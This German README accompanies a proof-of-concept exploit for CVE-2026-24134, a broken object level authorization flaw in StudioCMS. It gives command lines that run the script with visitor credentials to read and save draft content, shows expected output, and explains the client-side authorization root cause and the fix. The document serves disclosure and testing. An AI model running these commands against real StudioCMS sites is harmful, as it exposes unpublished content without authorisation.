
Proof-of-Concept-Exploit für CVE-2026-24134, eine Broken-Object-Level-Authorization-Schwachstelle in StudioCMS, die unbefugten Zugriff auf Entwurfsinhalte demonstriert.
Dieses Repository enthält den Proof of Concept (PoC) für CVE-2026-24134, eine Broken Object Level Authorization (BOLA)-Schwachstelle in StudioCMS.
cve_2026_24134_poc.py - Python-Exploit-Skriptpip install requests colorama
# Grundlegende Verwendung
python3 cve_2026_24134_poc.py \
-u http://localhost:4321 \
--username visitor_user \
--password visitor_pass \
--uuid bad87630-69a4-4cd6-bcb2-6965839dc148
# Ausgabe in Datei speichern
python3 cve_2026_24134_poc.py \
-u http://localhost:4321 \
--username visitor_user \
--password visitor_pass \
--uuid bad87630-69a4-4cd6-bcb2-6965839dc148 \
--save
python3 cve_2026_24134_poc.py \
-u http://localhost:4321 \
--auto-test \
--visitor-user visitor01 \
--visitor-pass visitorpass \
--editor-user editor01 \
--editor-pass editorpass \
--uuid bad87630-69a4-4cd6-bcb2-6965839dc148
-u, --url - Ziel-StudioCMS-Basis-URL--uuid - Ziel-UUID des Entwurfsinhalts--username - Benutzername für die Authentifizierung--password - Passwort für die Authentifizierung--auto-test - Automatisierte Tests aktivieren--visitor-user - Benutzername des Besucherkontos--visitor-pass - Passwort des Besucherkontos--editor-user - Benutzername des Editor-Kontos--editor-pass - Passwort des Editor-Kontos--save - Antwortinhalt in Datei speichern--no-ssl-verify - SSL-Zertifikatsprüfung deaktivierenpython3 cve_2026_24134_poc.py \
--url http://target.com \
--auto-test \
--visitor-user test_visitor \
--visitor-pass SecurePass123! \
--editor-user test_editor \
--editor-pass SecurePass456! \
--uuid 12345678-1234-1234-1234-123456789abc
Erwartete Ausgabe, wenn verwundbar:
[+] Successfully authenticated as test_visitor
[*] Detected user role: Visitor
[+] Successfully accessed draft content!
[!] VULNERABILITY CONFIRMED!
Erwartete Ausgabe, wenn gepatcht:
[+] Successfully authenticated as test_visitor
[*] Detected user role: Visitor
[*] Access denied (403 Forbidden)
[+] VULNERABILITY NOT PRESENT
python3 cve_2026_24134_poc.py \
--url http://localhost:4321 \
--username attacker \
--password pass123 \
--uuid target-uuid-here \
--save
Dadurch wird der vollständige Entwurfsinhalt in draft_{uuid}.html gespeichert.
[+] - Erfolgreiche Operation (grün)[*] - Informationsmeldung (blau)[!] - Warnung (gelb)[-] - Fehler (rot)Wenn Sie eine verwundbare Version von StudioCMS ausführen, aktualisieren Sie sofort auf die gepatchte Version.
Das eigentliche Problem: Autorisierungsprüfungen wurden clientseitig (JavaScript) durchgeführt, nicht serverseitig.
Laut dem Entwicklungsteam:
"Currently the rank level check to redirect is being done in client JS, which was supposed to be replaced shortly there after."
Die Lösung: Autorisierung vom Client auf den Server verlagern.
Kernprinzip: Vertraue niemals dem Client. Clientseitige Sicherheit = UX-Verbesserung. Serverseitige Sicherheit = tatsächlicher Schutz.
WICHTIG: Dieses Tool wird ausschließlich für Bildungszwecke und autorisierte Sicherheitstests bereitgestellt.
Bei Fragen zu diesem PoC oder der Schwachstelle:
Dieser PoC wird zu Bildungszwecken veröffentlicht. Verwenden Sie ihn verantwortungsvoll und ethisch.